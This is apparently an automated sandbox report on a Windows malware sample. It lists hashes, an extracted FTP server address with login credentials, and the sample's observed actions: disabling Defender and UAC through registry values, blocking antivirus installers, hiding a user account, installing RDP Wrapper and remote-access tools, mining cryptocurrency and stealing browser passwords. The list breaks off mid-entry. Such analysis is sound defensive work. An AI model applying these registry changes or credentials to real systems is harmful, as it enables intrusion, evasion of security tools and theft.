Analysis
-
max time kernel
270s -
max time network
271s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
19-06-2024 15:51
Static task
static1
Behavioral task
behavioral1
Sample
bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Resource
win10-20240404-en
General
-
Target
bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
-
Size
17.0MB
-
MD5
bd38e93c22ab359d615e7464fd252363
-
SHA1
a2100f45c63843df24fc95f0179851399951f9d7
-
SHA256
b072506b100e143611b6b01f8e4ac35115665771f6f25685d1e5f5426cc7f03b
-
SHA512
014c37ff5b55569a62db9be82df29102b1cb1e8ced11d25b3aedbf79dff2be9ddd3f577d1781a68b84ae39a62be1d99b156965c17c052315e67f43e0c9486cd1
-
SSDEEP
393216:iYp4jGXCrXu7RJuDZEIjUYmq1HmcopWtmeUb969RooKtN:HpnXDRAhocm4tLA9eRGN
Malware Config
Extracted
Protocol: ftp- Host:
194.67.198.139 - Port:
21 - Username:
alex - Password:
easypassword
Signatures
-
Processes:
bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
taskhostw.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhostw.exe -
Processes:
regedit.exebd38e93c22ab359d615e7464fd252363_JaffaCakes118.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" regedit.exe -
Processes:
regedit.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule C:\ProgramData\Microsoft\rootsystem\1.exe WebBrowserPassView -
Nirsoft 1 IoCs
Processes:
resource yara_rule C:\ProgramData\Microsoft\rootsystem\1.exe Nirsoft -
Blocklisted process makes network request 2 IoCs
Processes:
winit.exeflow pid process 6 4516 winit.exe 6 4516 winit.exe -
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
Processes:
bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (int) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe -
Drops file in Drivers directory 1 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 4572 netsh.exe 2348 netsh.exe -
Possible privilege escalation attempt 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 4112 icacls.exe 2420 icacls.exe 3400 icacls.exe 168 icacls.exe 2108 icacls.exe 2712 icacls.exe 4212 icacls.exe 2812 icacls.exe 2576 icacls.exe 4064 icacls.exe 4992 icacls.exe 4996 icacls.exe 3852 icacls.exe 4052 icacls.exe 4868 icacls.exe 2004 icacls.exe 3836 icacls.exe 4912 icacls.exe 3424 icacls.exe 4204 icacls.exe 828 icacls.exe 3348 icacls.exe 836 icacls.exe 600 icacls.exe 4576 icacls.exe 4328 icacls.exe 3836 icacls.exe 4664 icacls.exe 2988 icacls.exe 3868 icacls.exe 1292 icacls.exe 3804 icacls.exe 4540 icacls.exe 1736 icacls.exe 3876 icacls.exe 4532 icacls.exe 1748 icacls.exe 428 icacls.exe 4076 icacls.exe 4012 icacls.exe 2108 icacls.exe 4156 icacls.exe 2760 icacls.exe 956 icacls.exe 4868 icacls.exe 4016 icacls.exe 624 icacls.exe 1536 icacls.exe 3736 icacls.exe 1236 icacls.exe 4680 icacls.exe 4016 icacls.exe 1804 icacls.exe 4404 icacls.exe 3860 icacls.exe 3876 icacls.exe 5012 icacls.exe 3056 icacls.exe 4736 icacls.exe 3016 icacls.exe 2124 icacls.exe 488 icacls.exe 4956 icacls.exe 1604 icacls.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
Processes:
RDPWInst.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 4532 attrib.exe 3836 attrib.exe 2344 attrib.exe 4564 attrib.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\Programdata\Windows\vp8encoder.dll acprotect C:\Programdata\Windows\vp8decoder.dll acprotect -
Processes:
resource yara_rule C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 -
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Executes dropped EXE 34 IoCs
Processes:
Logs.exewinit.exeCheat.exewinit.exesvchost.exeP.exeP.exe1.exerutserv.exeR8.exerutserv.exewinlog.exerutserv.exewinlogon.exeVega.exerutserv.exeVegas.sfx.exerfusclient.exerfusclient.exeVegas.exeMOS.exeM.exeRar.exeCheat64.exetaskhostw.exeRDPWInst.exerfusclient.exeAppHost.exeRDPWInst.exetaskhostw.exetaskhostw.exeAppHost.exetaskhostw.exetaskhostw.exepid process 4840 Logs.exe 4136 winit.exe 3272 Cheat.exe 4516 winit.exe 2920 svchost.exe 924 P.exe 1884 P.exe 4416 1.exe 864 rutserv.exe 1308 R8.exe 4868 rutserv.exe 4916 winlog.exe 1428 rutserv.exe 1032 winlogon.exe 4232 Vega.exe 4344 rutserv.exe 380 Vegas.sfx.exe 4088 rfusclient.exe 4092 rfusclient.exe 768 Vegas.exe 4444 MOS.exe 2420 M.exe 4156 Rar.exe 1600 Cheat64.exe 2312 taskhostw.exe 4956 RDPWInst.exe 2812 rfusclient.exe 1116 AppHost.exe 4420 RDPWInst.exe 700 taskhostw.exe 5928 taskhostw.exe 5004 AppHost.exe 5944 taskhostw.exe 4648 taskhostw.exe -
Loads dropped DLL 1 IoCs
Processes:
svchost.exepid process 4120 svchost.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 3552 icacls.exe 3544 icacls.exe 4204 icacls.exe 5012 icacls.exe 168 icacls.exe 4400 icacls.exe 4664 icacls.exe 3348 icacls.exe 2992 icacls.exe 2420 icacls.exe 956 icacls.exe 3960 icacls.exe 1804 icacls.exe 2984 icacls.exe 836 icacls.exe 4404 icacls.exe 996 icacls.exe 4532 icacls.exe 2988 icacls.exe 3360 icacls.exe 2340 icacls.exe 3836 icacls.exe 1604 icacls.exe 624 icacls.exe 3400 icacls.exe 4664 icacls.exe 488 icacls.exe 1748 icacls.exe 3860 icacls.exe 5044 icacls.exe 2104 icacls.exe 3736 icacls.exe 2576 icacls.exe 3836 icacls.exe 3860 icacls.exe 1400 icacls.exe 3424 icacls.exe 428 icacls.exe 4868 icacls.exe 4064 icacls.exe 3016 icacls.exe 3056 icacls.exe 2108 icacls.exe 2988 icacls.exe 4492 icacls.exe 1896 icacls.exe 2268 icacls.exe 1596 icacls.exe 4632 icacls.exe 4680 icacls.exe 4240 icacls.exe 3868 icacls.exe 316 icacls.exe 2760 icacls.exe 3860 icacls.exe 3876 icacls.exe 4016 icacls.exe 4736 icacls.exe 488 icacls.exe 1536 icacls.exe 4144 icacls.exe 1548 icacls.exe 1596 icacls.exe 4992 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\programdata\microsoft\intel\winlogon.exe upx behavioral1/memory/1032-175-0x0000000000400000-0x0000000000419000-memory.dmp upx C:\Programdata\Windows\vp8encoder.dll upx C:\Programdata\Windows\vp8decoder.dll upx behavioral1/memory/1032-467-0x0000000000400000-0x0000000000419000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
taskhostw.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe -
Processes:
bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 28 iplogger.com 29 iplogger.com 11 raw.githubusercontent.com 12 raw.githubusercontent.com 23 raw.githubusercontent.com 26 raw.githubusercontent.com -
Modifies WinLogon 2 TTPs 7 IoCs
Processes:
bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exeRDPWInst.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Programdata\Windows\winit.exe autoit_exe C:\ProgramData\Microsoft\Intel\svchost.exe autoit_exe C:\ProgramData\Microsoft\Intel\Vega.exe autoit_exe -
Drops file in System32 directory 8 IoCs
Processes:
powershell.exebd38e93c22ab359d615e7464fd252363_JaffaCakes118.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini powershell.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI powershell.exe File opened for modification C:\Windows\SysWOW64\xmr64 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\windows\SysWOW64\xmr bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Windows\SysWOW64\hhsm bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\windows\SysWOW64\hs bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Windows\System32\GroupPolicy powershell.exe -
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
Processes:
bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exeregedit.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe -
Drops file in Program Files directory 22 IoCs
Processes:
bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exeRDPWInst.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Program Files (x86)\SpyHunter bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files\Enigma Software Group bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files\AVG bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files\Kaspersky Lab bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files\Cezurity bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini attrib.exe File opened for modification C:\Program Files (x86)\AVG bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Cezurity bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files\RDP Wrapper attrib.exe File opened for modification C:\Program Files\Malwarebytes bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll attrib.exe File opened for modification C:\Program Files (x86)\360 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files\COMODO bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files\SpyHunter bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files\AVAST Software bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\AVAST Software bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files\ESET bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Panda Security bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe -
Drops file in Windows directory 8 IoCs
Processes:
taskmgr.exebd38e93c22ab359d615e7464fd252363_JaffaCakes118.exedescription ioc process File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe File opened for modification C:\Windows\windowsnode bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Windows\hhsm bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Windows\min bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Windows\hs_module bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Windows\WindowsDefender bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File opened for modification C:\Windows\rss bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe -
Launches sc.exe 13 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1192 sc.exe 3492 sc.exe 2268 sc.exe 3016 sc.exe 1536 sc.exe 3016 sc.exe 2148 sc.exe 2976 sc.exe 2616 sc.exe 4728 sc.exe 4140 sc.exe 4476 sc.exe 4984 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
winit.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe -
Delays execution with timeout.exe 14 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 4552 timeout.exe 764 timeout.exe 4076 timeout.exe 5000 timeout.exe 360 timeout.exe 2680 timeout.exe 3008 timeout.exe 1248 timeout.exe 4388 timeout.exe 4680 timeout.exe 3532 timeout.exe 4084 timeout.exe 4484 timeout.exe 3408 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 3076 ipconfig.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4116 taskkill.exe 3084 taskkill.exe 2692 taskkill.exe 4424 taskkill.exe 1428 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133632859547787188" chrome.exe -
Modifies registry class 10 IoCs
Processes:
winit.exewinit.exetaskmgr.exeP.exeR8.exeMOS.execmd.exechrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings P.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings R8.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\MIME\Database winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings MOS.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings chrome.exe -
Runs .reg file with regedit 1 IoCs
Processes:
regedit.exepid process 2312 regedit.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4576 schtasks.exe 32 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 29 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe1.exerutserv.exerutserv.exerutserv.exerutserv.exepowershell.exewinit.exepid process 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4416 1.exe 4416 1.exe 4416 1.exe 4416 1.exe 4416 1.exe 4416 1.exe 4416 1.exe 4416 1.exe 4416 1.exe 4416 1.exe 4416 1.exe 4416 1.exe 864 rutserv.exe 864 rutserv.exe 864 rutserv.exe 864 rutserv.exe 864 rutserv.exe 864 rutserv.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4868 rutserv.exe 4868 